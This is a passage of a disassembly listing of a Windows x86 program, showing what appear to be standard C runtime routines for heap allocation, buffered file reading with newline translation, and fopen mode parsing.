mov ecx, [edi]
mov ebx, [ebp+arg_0]
cmp ecx, ebx
jl short loc_41ECCA
cmp [edi+4], ebx
jbe short loc_41ECCA
push ebx
push ecx
push eax
call sub_41EE76
add esp, 0Ch
test eax, eax
jnz short loc_41ED39
mov eax, [ebp+var_4]
mov [edi+4], ebx
loc_41ECCA: ; CODE XREF: sub_41EC6E+40�j
; sub_41EC6E+45�j
add edi, 8
lea ecx, [esi+2018h]
add eax, 1000h
cmp edi, ecx
mov [ebp+var_4], eax
jb short loc_41ECA7
jmp short loc_41ECE4
; ---------------------------------------------------------------------------
loc_41ECE1: ; CODE XREF: sub_41EC6E+37�j
mov ebx, [ebp+arg_0]
loc_41ECE4: ; CODE XREF: sub_41EC6E+71�j
mov eax, [esi+8]
mov ecx, [esi+10h]
lea edi, [esi+18h]
mov [ebp+var_8], eax
cmp edi, eax
mov [ebp+var_4], ecx
jnb short loc_41ED2A
loc_41ECF7: ; CODE XREF: sub_41EC6E+B5�j
mov eax, [edi]
cmp eax, ebx
jl short loc_41ED16
cmp [edi+4], ebx
jbe short loc_41ED16
push ebx
push eax
push [ebp+var_4]
call sub_41EE76
add esp, 0Ch
test eax, eax
jnz short loc_41ED39
mov [edi+4], ebx
loc_41ED16: ; CODE XREF: sub_41EC6E+8D�j
; sub_41EC6E+92�j
add [ebp+var_4], 1000h
add edi, 8
cmp edi, [ebp+var_8]
jb short loc_41ECF7
jmp short loc_41ED2A
; ---------------------------------------------------------------------------
loc_41ED27: ; CODE XREF: sub_41EC6E+14�j
mov ebx, [ebp+arg_0]
loc_41ED2A: ; CODE XREF: sub_41EC6E+87�j
; sub_41EC6E+B7�j
mov esi, [esi]
cmp esi, off_43C9D0
jz short loc_41ED49
jmp loc_41EC7C
; ---------------------------------------------------------------------------
loc_41ED39: ; CODE XREF: sub_41EC6E+54�j
; sub_41EC6E+A3�j
mov off_43C9D0, esi
sub [edi], ebx
mov [esi+8], edi
jmp loc_41EE71
; ---------------------------------------------------------------------------
loc_41ED49: ; CODE XREF: sub_41EC6E+C4�j
mov eax, offset off_43A9B0
mov edi, eax
loc_41ED50: ; CODE XREF: sub_41EC6E+F8�j
cmp dword ptr [edi+10h], 0FFFFFFFFh
jz short loc_41ED5C
cmp dword ptr [edi+0Ch], 0
jnz short loc_41ED68
loc_41ED5C: ; CODE XREF: sub_41EC6E+E6�j
mov edi, [edi]
cmp edi, eax
jz loc_41EE3D
jmp short loc_41ED50
; ---------------------------------------------------------------------------
loc_41ED68: ; CODE XREF: sub_41EC6E+EC�j
mov ebx, [edi+0Ch]
and [ebp+var_4], 0
mov esi, ebx
mov eax, ebx
sub esi, edi
sub esi, 18h
sar esi, 3
shl esi, 0Ch
add esi, [edi+10h]
cmp dword ptr [ebx], 0FFFFFFFFh
jnz short loc_41ED97
loc_41ED86: ; CODE XREF: sub_41EC6E+127�j
cmp [ebp+var_4], 10h
jge short loc_41ED97
add eax, 8
inc [ebp+var_4]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_41ED86
loc_41ED97: ; CODE XREF: sub_41EC6E+116�j
; sub_41EC6E+11C�j
mov eax, [ebp+var_4]
push 4
shl eax, 0Ch
push 1000h
push eax
push esi
mov [ebp+var_8], eax
call dword_4271C4 ; VirtualAlloc
cmp eax, esi
jnz loc_41EE6F
push 0
push [ebp+var_8]
push esi
call sub_41B590
mov edx, [ebp+var_4]
add esp, 0Ch
test edx, edx
mov ecx, ebx
jle short loc_41EDFE
lea eax, [esi+4]
mov [ebp+var_4], edx
loc_41EDD4: ; CODE XREF: sub_41EC6E+18E�j
or byte ptr [eax+0F4h], 0FFh
lea edx, [eax+4]
mov [eax-4], edx
mov edx, 0F0h
mov [eax], edx
mov [ecx], edx
mov dword ptr [ecx+4], 0F1h
add eax, 1000h
add ecx, 8
dec [ebp+var_4]
jnz short loc_41EDD4
loc_41EDFE: ; CODE XREF: sub_41EC6E+15E�j
mov off_43C9D0, edi
lea eax, [edi+2018h]
loc_41EE0A: ; CODE XREF: sub_41EC6E+1A8�j
cmp ecx, eax
jnb short loc_41EE1A
cmp dword ptr [ecx], 0FFFFFFFFh
jz short loc_41EE18
add ecx, 8
jmp short loc_41EE0A
; ---------------------------------------------------------------------------
loc_41EE18: ; CODE XREF: sub_41EC6E+1A3�j
cmp ecx, eax
loc_41EE1A: ; CODE XREF: sub_41EC6E+19E�j
sbb eax, eax
and eax, ecx
mov [edi+0Ch], eax
mov eax, [ebp+arg_0]
mov [esi+8], al
mov [edi+8], ebx
sub [ebx], eax
sub [esi+4], eax
lea ecx, [esi+eax+8]
lea eax, [esi+100h]
mov [esi], ecx
jmp short loc_41EE71
; ---------------------------------------------------------------------------
loc_41EE3D: ; CODE XREF: sub_41EC6E+F2�j
call sub_41E976
test eax, eax
jz short loc_41EE6F
mov ecx, [eax+10h]
mov [ecx+8], bl
lea edx, [ecx+ebx+8]
mov off_43C9D0, eax
mov [ecx], edx
mov edx, 0F0h
sub edx, ebx
mov [ecx+4], edx
movzx edx, bl
sub [eax+18h], edx
lea eax, [ecx+100h]
jmp short loc_41EE71
; ---------------------------------------------------------------------------
loc_41EE6F: ; CODE XREF: sub_41EC6E+143�j
; sub_41EC6E+1D6�j
xor eax, eax
loc_41EE71: ; CODE XREF: sub_41EC6E+D6�j
; sub_41EC6E+1CD�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41EC6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EE76 proc near ; CODE XREF: sub_41EC6E+4A�p
; sub_41EC6E+99�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_8]
push ebx
push esi
mov esi, [ecx+4]
push edi
mov edi, [ecx]
lea ebx, [ecx+0F8h]
cmp esi, edx
mov [ebp+var_4], edi
mov eax, edi
mov [ebp+arg_0], ebx
jb short loc_41EEBB
lea eax, [edi+edx]
mov [edi], dl
cmp eax, ebx
jnb short loc_41EEAA
add [ecx], edx
sub [ecx+4], edx
jmp short loc_41EEB3
; ---------------------------------------------------------------------------
loc_41EEAA: ; CODE XREF: sub_41EE76+2B�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_41EEB3: ; CODE XREF: sub_41EE76+32�j
lea eax, [edi+8]
jmp loc_41EF89
; ---------------------------------------------------------------------------
loc_41EEBB: ; CODE XREF: sub_41EE76+22�j
add esi, edi
cmp byte ptr [esi], 0
jz short loc_41EEC4
mov eax, esi
loc_41EEC4: ; CODE XREF: sub_41EE76+4A�j
lea esi, [eax+edx]
cmp esi, ebx
jnb short loc_41EF0E
loc_41EECB: ; CODE XREF: sub_41EE76+96�j
mov bl, [eax]
test bl, bl
jnz short loc_41EF01
push 1
lea ebx, [eax+1]
pop esi
loc_41EED7: ; CODE XREF: sub_41EE76+68�j
cmp byte ptr [ebx], 0
jnz short loc_41EEE0
inc ebx
inc esi
jmp short loc_41EED7
; ---------------------------------------------------------------------------
loc_41EEE0: ; CODE XREF: sub_41EE76+64�j
cmp esi, edx
jnb short loc_41EF32
cmp eax, [ebp+var_4]
jnz short loc_41EEEE
mov [ecx+4], esi
jmp short loc_41EEFA
; ---------------------------------------------------------------------------
loc_41EEEE: ; CODE XREF: sub_41EE76+71�j
sub [ebp+arg_4], esi
cmp [ebp+arg_4], edx
jb loc_41EF93
loc_41EEFA: ; CODE XREF: sub_41EE76+76�j
mov edi, [ebp+var_4]
mov eax, ebx
jmp short loc_41EF06
; ---------------------------------------------------------------------------
loc_41EF01: ; CODE XREF: sub_41EE76+59�j
movzx esi, bl
add eax, esi
loc_41EF06: ; CODE XREF: sub_41EE76+89�j
lea esi, [eax+edx]
cmp esi, [ebp+arg_0]
jb short loc_41EECB
loc_41EF0E: ; CODE XREF: sub_41EE76+53�j
lea esi, [ecx+8]
loc_41EF11: ; CODE XREF: sub_41EE76+EB�j
; sub_41EE76+F2�j
cmp esi, edi
jnb short loc_41EF93
lea eax, [esi+edx]
cmp eax, [ebp+arg_0]
jnb short loc_41EF93
mov al, [esi]
test al, al
jnz short loc_41EF63
push 1
lea ebx, [esi+1]
pop eax
loc_41EF29: ; CODE XREF: sub_41EE76+BA�j
cmp byte ptr [ebx], 0
jnz short loc_41EF53
inc ebx
inc eax
jmp short loc_41EF29
; ---------------------------------------------------------------------------
loc_41EF32: ; CODE XREF: sub_41EE76+6C�j
lea ebx, [eax+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_41EF43
sub esi, edx
mov [ecx], ebx
mov [ecx+4], esi
jmp short loc_41EF4C
; ---------------------------------------------------------------------------
loc_41EF43: ; CODE XREF: sub_41EE76+C2�j
and dword ptr [ecx+4], 0
lea esi, [ecx+8]
mov [ecx], esi
loc_41EF4C: ; CODE XREF: sub_41EE76+CB�j
mov [eax], dl
add eax, 8
jmp short loc_41EF89
; ---------------------------------------------------------------------------
loc_41EF53: ; CODE XREF: sub_41EE76+B6�j
cmp eax, edx
jnb short loc_41EF6A
sub [ebp+arg_4], eax
cmp [ebp+arg_4], edx
jb short loc_41EF93
mov esi, ebx
jmp short loc_41EF11
; ---------------------------------------------------------------------------
loc_41EF63: ; CODE XREF: sub_41EE76+AB�j
movzx eax, al
add esi, eax
jmp short loc_41EF11
; ---------------------------------------------------------------------------
loc_41EF6A: ; CODE XREF: sub_41EE76+DF�j
lea ebx, [esi+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_41EF7B
sub eax, edx
mov [ecx], ebx
mov [ecx+4], eax
jmp short loc_41EF84
; ---------------------------------------------------------------------------
loc_41EF7B: ; CODE XREF: sub_41EE76+FA�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_41EF84: ; CODE XREF: sub_41EE76+103�j
mov [esi], dl
lea eax, [esi+8]
loc_41EF89: ; CODE XREF: sub_41EE76+40�j
; sub_41EE76+DB�j
imul ecx, 0Fh
shl eax, 4
sub eax, ecx
jmp short loc_41EF95
; ---------------------------------------------------------------------------
loc_41EF93: ; CODE XREF: sub_41EE76+7E�j
; sub_41EE76+9D�j ...
xor eax, eax
loc_41EF95: ; CODE XREF: sub_41EE76+11B�j
pop edi
pop esi
pop ebx
leave
retn
sub_41EE76 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EF9A proc near ; CODE XREF: sub_41B202+19A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
movzx ecx, byte ptr [edx]
push edi
mov edi, [ebp+arg_0]
and [ebp+var_4], 0
mov eax, ebx
sub eax, [edi+10h]
sar eax, 0Ch
cmp ecx, [ebp+arg_C]
lea edi, [edi+eax*8+18h]
jbe short loc_41EFD4
mov eax, [ebp+arg_C]
sub ecx, eax
mov [edx], al
add [edi], ecx
mov dword ptr [edi+4], 0F1h
jmp short loc_41F034
; ---------------------------------------------------------------------------
loc_41EFD4: ; CODE XREF: sub_41EF9A+26�j
jnb short loc_41F03B
mov eax, [ebp+arg_C]
lea esi, [edx+eax]
lea eax, [ebx+0F8h]
cmp eax, esi
jb short loc_41F03B
lea eax, [ecx+edx]
loc_41EFE9: ; CODE XREF: sub_41EF9A+59�j
cmp eax, esi
jnb short loc_41EFF7
cmp byte ptr [eax], 0
jnz short loc_41EFF5
inc eax
jmp short loc_41EFE9
; ---------------------------------------------------------------------------
loc_41EFF5: ; CODE XREF: sub_41EF9A+56�j
cmp eax, esi
loc_41EFF7: ; CODE XREF: sub_41EF9A+51�j
jnz short loc_41F03B
mov al, byte ptr [ebp+arg_C]
mov [edx], al
mov eax, [ebx]
cmp edx, eax
ja short loc_41F02F
cmp esi, eax
jbe short loc_41F02F
lea eax, [ebx+0F8h]
cmp esi, eax
jnb short loc_41F026
xor eax, eax
mov [ebx], esi
cmp [esi], al
jnz short loc_41F021
loc_41F01A: ; CODE XREF: sub_41EF9A+85�j
inc eax
cmp byte ptr [esi+eax], 0
jz short loc_41F01A
loc_41F021: ; CODE XREF: sub_41EF9A+7E�j
mov [ebx+4], eax
jmp short loc_41F02F
; ---------------------------------------------------------------------------
loc_41F026: ; CODE XREF: sub_41EF9A+76�j
and dword ptr [ebx+4], 0
lea eax, [ebx+8]
mov [ebx], eax
loc_41F02F: ; CODE XREF: sub_41EF9A+68�j
; sub_41EF9A+6C�j ...
sub ecx, [ebp+arg_C]
add [edi], ecx
loc_41F034: ; CODE XREF: sub_41EF9A+38�j
mov [ebp+var_4], 1
loc_41F03B: ; CODE XREF: sub_41EF9A:loc_41EFD4�j
; sub_41EF9A+4A�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_41EF9A endp
; =============== S U B R O U T I N E =======================================
sub_41F043 proc near ; CODE XREF: sub_41B11A+A9�p
; sub_41BB4F+2D�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz loc_41F117
test al, 40h
jnz loc_41F117
test al, 2
jz short loc_41F069
or al, 20h
mov [esi+0Ch], eax
jmp loc_41F117
; ---------------------------------------------------------------------------
loc_41F069: ; CODE XREF: sub_41F043+1A�j
or al, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_41F07D
push esi
call sub_4239EF
pop ecx
jmp short loc_41F082
; ---------------------------------------------------------------------------
loc_41F07D: ; CODE XREF: sub_41F043+2F�j
mov eax, [esi+8]
mov [esi], eax
loc_41F082: ; CODE XREF: sub_41F043+38�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_41F11C
add esp, 0Ch
mov [esi+4], eax
test eax, eax
jz short loc_41F106
cmp eax, 0FFFFFFFFh
jz short loc_41F106
mov edx, [esi+0Ch]
test dl, 82h
jnz short loc_41F0DB
mov ecx, [esi+10h]
push edi
cmp ecx, 0FFFFFFFFh
jz short loc_41F0C4
mov edi, ecx
sar edi, 5
and ecx, 1Fh
mov edi, ds:dword_4DCCA0[edi*4]
lea edi, [edi+ecx*8]
jmp short loc_41F0C9
; ---------------------------------------------------------------------------
loc_41F0C4: ; CODE XREF: sub_41F043+6B�j
mov edi, offset dword_43D030
loc_41F0C9: ; CODE XREF: sub_41F043+7F�j
mov cl, [edi+4]
pop edi
and cl, 82h
cmp cl, 82h
jnz short loc_41F0DB
or dh, 20h
mov [esi+0Ch], edx
loc_41F0DB: ; CODE XREF: sub_41F043+62�j
; sub_41F043+90�j
cmp dword ptr [esi+18h], 200h
jnz short loc_41F0F8
mov ecx, [esi+0Ch]
test cl, 8
jz short loc_41F0F8
test ch, 4
jnz short loc_41F0F8
mov dword ptr [esi+18h], 1000h
loc_41F0F8: ; CODE XREF: sub_41F043+9F�j
; sub_41F043+A7�j ...
mov ecx, [esi]
dec eax
mov [esi+4], eax
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41F106: ; CODE XREF: sub_41F043+55�j
; sub_41F043+5A�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
and dword ptr [esi+4], 0
loc_41F117: ; CODE XREF: sub_41F043+A�j
; sub_41F043+12�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_41F043 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F11C proc near ; CODE XREF: sub_41B11A+90�p
; sub_41F043+48�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
cmp esi, ds:dword_4DCDA0
jnb loc_41F2F9
mov eax, esi
and esi, 1Fh
sar eax, 5
shl esi, 3
lea ebx, ds:4DCCA0h[eax*4]
mov eax, ds:dword_4DCCA0[eax*4]
add eax, esi
mov dl, [eax+4]
test dl, 1
jz loc_41F2F9
and [ebp+var_8], 0
mov edi, [ebp+arg_4]
cmp [ebp+arg_8], 0
mov ecx, edi
jz short loc_41F1D1
test dl, 2
jnz short loc_41F1D1
test dl, 48h
jz short loc_41F191
mov al, [eax+5]
cmp al, 0Ah
jz short loc_41F191
dec [ebp+arg_8]
mov [edi], al
mov eax, [ebx]
lea ecx, [edi+1]
mov [ebp+var_8], 1
mov byte ptr [eax+esi+5], 0Ah
loc_41F191: ; CODE XREF: sub_41F11C+56�j
; sub_41F11C+5D�j
lea eax, [ebp+var_C]
push 0
push eax
mov eax, [ebx]
push [ebp+arg_8]
push ecx
push dword ptr [eax+esi]
call dword_4270E8 ; ReadFile
test eax, eax
jnz short loc_41F1E4
call dword_42708C ; RtlGetLastWin32Error
push 5
pop ecx
cmp eax, ecx
jnz short loc_41F1CC
mov ds:dword_4DB958, 9
mov ds:dword_4DB95C, ecx
jmp loc_41F30A
; ---------------------------------------------------------------------------
loc_41F1CC: ; CODE XREF: sub_41F11C+99�j
cmp eax, 6Dh
jnz short loc_41F1D8
loc_41F1D1: ; CODE XREF: sub_41F11C+4C�j
; sub_41F11C+51�j
xor eax, eax
jmp loc_41F30D
; ---------------------------------------------------------------------------
loc_41F1D8: ; CODE XREF: sub_41F11C+B3�j
push eax
call sub_4203DF
pop ecx
jmp loc_41F30A
; ---------------------------------------------------------------------------
loc_41F1E4: ; CODE XREF: sub_41F11C+8C�j
mov eax, [ebx]
mov edx, [ebp+var_C]
add [ebp+var_8], edx
lea ecx, [eax+esi+4]
mov al, [eax+esi+4]
test al, 80h
jz loc_41F2F4
test edx, edx
jz short loc_41F209
cmp byte ptr [edi], 0Ah
jnz short loc_41F209
or al, 4
jmp short loc_41F20B
; ---------------------------------------------------------------------------
loc_41F209: ; CODE XREF: sub_41F11C+E2�j
; sub_41F11C+E7�j
and al, 0FBh
loc_41F20B: ; CODE XREF: sub_41F11C+EB�j
mov [ecx], al
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
mov [ebp+arg_8], eax
add ecx, eax
cmp eax, ecx
mov [ebp+var_8], ecx
jnb loc_41F2EE
loc_41F223: ; CODE XREF: sub_41F11C+1BA�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, 1Ah
jz loc_41F2DE
cmp al, 0Dh
jz short loc_41F23F
mov [edi], al
inc edi
inc [ebp+arg_8]
jmp loc_41F2D0
; ---------------------------------------------------------------------------
loc_41F23F: ; CODE XREF: sub_41F11C+116�j
dec ecx
cmp [ebp+arg_8], ecx
jnb short loc_41F25D
mov eax, [ebp+arg_8]
inc eax
cmp byte ptr [eax], 0Ah
jnz short loc_41F254
add [ebp+arg_8], 2
jmp short loc_41F2B2
; ---------------------------------------------------------------------------
loc_41F254: ; CODE XREF: sub_41F11C+130�j
mov byte ptr [edi], 0Dh
inc edi
mov [ebp+arg_8], eax
jmp short loc_41F2D0
; ---------------------------------------------------------------------------
loc_41F25D: ; CODE XREF: sub_41F11C+127�j
lea eax, [ebp+var_C]
push 0
push eax
inc [ebp+arg_8]
lea eax, [ebp+var_1]
push 1
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call dword_4270E8 ; ReadFile
test eax, eax
jnz short loc_41F285
call dword_42708C ; RtlGetLastWin32Error
test eax, eax
jnz short loc_41F2CC
loc_41F285: ; CODE XREF: sub_41F11C+15D�j
cmp [ebp+var_C], 0
jz short loc_41F2CC
mov eax, [ebx]
test byte ptr [eax+esi+4], 48h
jz short loc_41F2A7
mov al, [ebp+var_1]
cmp al, 0Ah
jz short loc_41F2B2
mov byte ptr [edi], 0Dh
mov ecx, [ebx]
inc edi
mov [ecx+esi+5], al
jmp short loc_41F2D0
; ---------------------------------------------------------------------------
loc_41F2A7: ; CODE XREF: sub_41F11C+176�j
cmp edi, [ebp+arg_4]
jnz short loc_41F2B7
cmp [ebp+var_1], 0Ah
jnz short loc_41F2B7
loc_41F2B2: ; CODE XREF: sub_41F11C+136�j
; sub_41F11C+17D�j
mov byte ptr [edi], 0Ah
jmp short loc_41F2CF
; ---------------------------------------------------------------------------
loc_41F2B7: ; CODE XREF: sub_41F11C+18E�j
; sub_41F11C+194�j
push 1
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_42272B
add esp, 0Ch
cmp [ebp+var_1], 0Ah
jz short loc_41F2D0
loc_41F2CC: ; CODE XREF: sub_41F11C+167�j
; sub_41F11C+16D�j
mov byte ptr [edi], 0Dh
loc_41F2CF: ; CODE XREF: sub_41F11C+199�j
inc edi
loc_41F2D0: ; CODE XREF: sub_41F11C+11E�j
; sub_41F11C+13F�j ...
mov ecx, [ebp+var_8]
cmp [ebp+arg_8], ecx
jb loc_41F223
jmp short loc_41F2EE
; ---------------------------------------------------------------------------
loc_41F2DE: ; CODE XREF: sub_41F11C+10E�j
mov eax, [ebx]
lea esi, [eax+esi+4]
mov al, [esi]
test al, 40h
jnz short loc_41F2EE
or al, 2
mov [esi], al
loc_41F2EE: ; CODE XREF: sub_41F11C+101�j
; sub_41F11C+1C0�j ...
sub edi, [ebp+arg_4]
mov [ebp+var_8], edi
loc_41F2F4: ; CODE XREF: sub_41F11C+DA�j
mov eax, [ebp+var_8]
jmp short loc_41F30D
; ---------------------------------------------------------------------------
loc_41F2F9: ; CODE XREF: sub_41F11C+12�j
; sub_41F11C+39�j
and ds:dword_4DB95C, 0
mov ds:dword_4DB958, 9
loc_41F30A: ; CODE XREF: sub_41F11C+AB�j
; sub_41F11C+C3�j
or eax, 0FFFFFFFFh
loc_41F30D: ; CODE XREF: sub_41F11C+B7�j
; sub_41F11C+1DB�j
pop edi
pop esi
pop ebx
leave
retn
sub_41F11C endp
; =============== S U B R O U T I N E =======================================
sub_41F312 proc near ; CODE XREF: sub_41B202+126�p
; sub_41B202+24B�p ...
arg_0 = dword ptr 4
mov eax, ds:dword_4DB9D8
test eax, eax
jz short loc_41F32A
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_41F32A
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41F32A: ; CODE XREF: sub_41F312+7�j
; sub_41F312+12�j
xor eax, eax
retn
sub_41F312 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F32D proc near ; CODE XREF: sub_41B4A2+17�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, ds:dword_4DBB44
push edi
mov edi, [ebp+arg_4]
xor ebx, ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov al, [edi]
cmp al, 61h
jz short loc_41F366
cmp al, 72h
jz short loc_41F35F
cmp al, 77h
jnz loc_41F47A
mov ecx, 301h
jmp short loc_41F36B
; ---------------------------------------------------------------------------
loc_41F35F: ; CODE XREF: sub_41F32D+21�j
xor ecx, ecx
or esi, 1
jmp short loc_41F36E
; ---------------------------------------------------------------------------
loc_41F366: ; CODE XREF: sub_41F32D+1D�j
mov ecx, 109h
loc_41F36B: ; CODE XREF: sub_41F32D+30�j
or esi, 2
loc_41F36E: ; CODE XREF: sub_41F32D+37�j
push 1
pop edx
loc_41F371: ; CODE XREF: sub_41F32D+8B�j
; sub_41F32D+A0�j ...
mov al, [edi+1]
inc edi
cmp al, bl
jz loc_41F460
cmp edx, ebx
jz loc_41F460
movsx eax, al
cmp eax, 54h
jg short loc_41F3FF
jz short loc_41F3EF
sub eax, 2Bh
jz short loc_41F3D9
sub eax, 19h
jz short loc_41F3CF
sub eax, 0Eh
jz short loc_41F3BA
dec eax
jnz loc_41F451
cmp [ebp+var_4], ebx
jnz loc_41F451
mov [ebp+var_4], 1
or ecx, 20h
jmp short loc_41F371
; ---------------------------------------------------------------------------
loc_41F3BA: ; CODE XREF: sub_41F32D+6F�j
cmp [ebp+var_4], ebx
jnz loc_41F451
mov [ebp+var_4], 1
or ecx, 10h
jmp short loc_41F371
; ---------------------------------------------------------------------------
loc_41F3CF: ; CODE XREF: sub_41F32D+6A�j
test cl, 40h
jnz short loc_41F451
or ecx, 40h
jmp short loc_41F371
; ---------------------------------------------------------------------------
loc_41F3D9: ; CODE XREF: sub_41F32D+65�j
test cl, 2
jnz short loc_41F451
and ecx, 0FFFFFFFEh
and esi, 0FFFFFFFCh
or ecx, 2
or esi, 80h
jmp short loc_41F371
; ---------------------------------------------------------------------------
loc_41F3EF: ; CODE XREF: sub_41F32D+60�j
mov eax, 1000h
test ecx, eax
jnz short loc_41F451
or ecx, eax
jmp loc_41F371
; ---------------------------------------------------------------------------
loc_41F3FF: ; CODE XREF: sub_41F32D+5E�j
sub eax, 62h
jz short loc_41F44C
dec eax
jz short loc_41F435
sub eax, 0Bh
jz short loc_41F41E
sub eax, 6
jnz short loc_41F451
test ch, 0C0h
jnz short loc_41F451
or ch, 40h
jmp loc_41F371
; ---------------------------------------------------------------------------
loc_41F41E: ; CODE XREF: sub_41F32D+DD�j
cmp [ebp+var_8], ebx
jnz short loc_41F451
mov [ebp+var_8], 1
and esi, 0FFFFBFFFh
jmp loc_41F371
; ---------------------------------------------------------------------------
loc_41F435: ; CODE XREF: sub_41F32D+D8�j
cmp [ebp+var_8], ebx
jnz short loc_41F451
mov [ebp+var_8], 1
or esi, 4000h
jmp loc_41F371
; ---------------------------------------------------------------------------
loc_41F44C: ; CODE XREF: sub_41F32D+D5�j
test ch, 0C0h
jz short loc_41F458
loc_41F451: ; CODE XREF: sub_41F32D+72�j
; sub_41F32D+7B�j ...
xor edx, edx
jmp loc_41F371
; ---------------------------------------------------------------------------
loc_41F458: ; CODE XREF: sub_41F32D+122�j
or ch, 80h
jmp loc_41F371
; ---------------------------------------------------------------------------
loc_41F460: ; CODE XREF: sub_41F32D+4A�j
; sub_41F32D+52�j
push 1A4h
push [ebp+arg_8]
push ecx
push [ebp+arg_0]
call sub_423A33
mov ecx, eax
add esp, 10h
cmp ecx, ebx
jge short loc_41F47E
loc_41F47A: ; CODE XREF: sub_41F32D+25�j
xor eax, eax
jmp short loc_41F498
; ---------------------------------------------------------------------------
loc_41F47E: ; CODE XREF: sub_41F32D+14B�j
mov eax, [ebp+arg_C]
inc ds:dword_4DBB40
mov [eax+0Ch], esi
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_41F498: ; CODE XREF: sub_41F32D+14F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41F32D endp
; =============== S U B R O U T I N E =======================================
sub_41F49D proc near ; CODE XREF: sub_41B4A2�p
mov edx, ds:dword_4DCC80
push ebx
push ebp
push esi
xor ebp, ebp
xor esi, esi
xor eax, eax
cmp edx, ebp
push edi
jle short loc_41F50E
mov ebx, ds:dword_4DBC78
mov edi, ebx
loc_41F4B9: ; CODE XREF: sub_41F49D+2E�j
mov ecx, [edi]
cmp ecx, ebp
jz short loc_41F4D4
test byte ptr [ecx+0Ch], 83h
jz short loc_41F4CF
inc eax
add edi, 4
cmp eax, edx
jl short loc_41F4B9
jmp short loc_41F50E
; ---------------------------------------------------------------------------
loc_41F4CF: ; CODE XREF: sub_41F49D+26�j
mov esi, [ebx+eax*4]
jmp short loc_41F4F8
; ---------------------------------------------------------------------------
loc_41F4D4: ; CODE XREF: sub_41F49D+20�j
mov edi, eax
push 20h
shl edi, 2
call sub_41B4D5
pop ecx
mov ecx, ds:dword_4DBC78
mov [edi+ecx], eax
mov eax, ds:dword_4DBC78
mov edi, [edi+eax]
cmp edi, ebp
jz short loc_41F50E
mov esi, edi
loc_41F4F8: ; CODE XREF: sub_41F49D+35�j
cmp esi, ebp
jz short loc_41F50E
or dword ptr [esi+10h], 0FFFFFFFFh
mov [esi+4], ebp
mov [esi+0Ch], ebp
mov [esi+8], ebp
mov [esi], ebp
mov [esi+1Ch], ebp
loc_41F50E: ; CODE XREF: sub_41F49D+12�j
; sub_41F49D+30�j ...
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41F49D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F515 proc near ; CODE XREF: sub_41B6EE+17�p
; sub_41B6EE+58�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_41F533
mov ecx, off_43C9D8
movzx eax, word ptr [ecx+eax*2]
jmp short loc_41F585
; ---------------------------------------------------------------------------
loc_41F533: ; CODE XREF: sub_41F515+10�j
mov ecx, eax
push esi
mov esi, off_43C9D8
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_41F558
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_41F561
; ---------------------------------------------------------------------------
loc_41F558: ; CODE XREF: sub_41F515+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_41F561: ; CODE XREF: sub_41F515+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_423CEC
add esp, 1Ch
test eax, eax
jnz short loc_41F581
leave
retn
; ---------------------------------------------------------------------------
loc_41F581: ; CODE XREF: sub_41F515+68�j
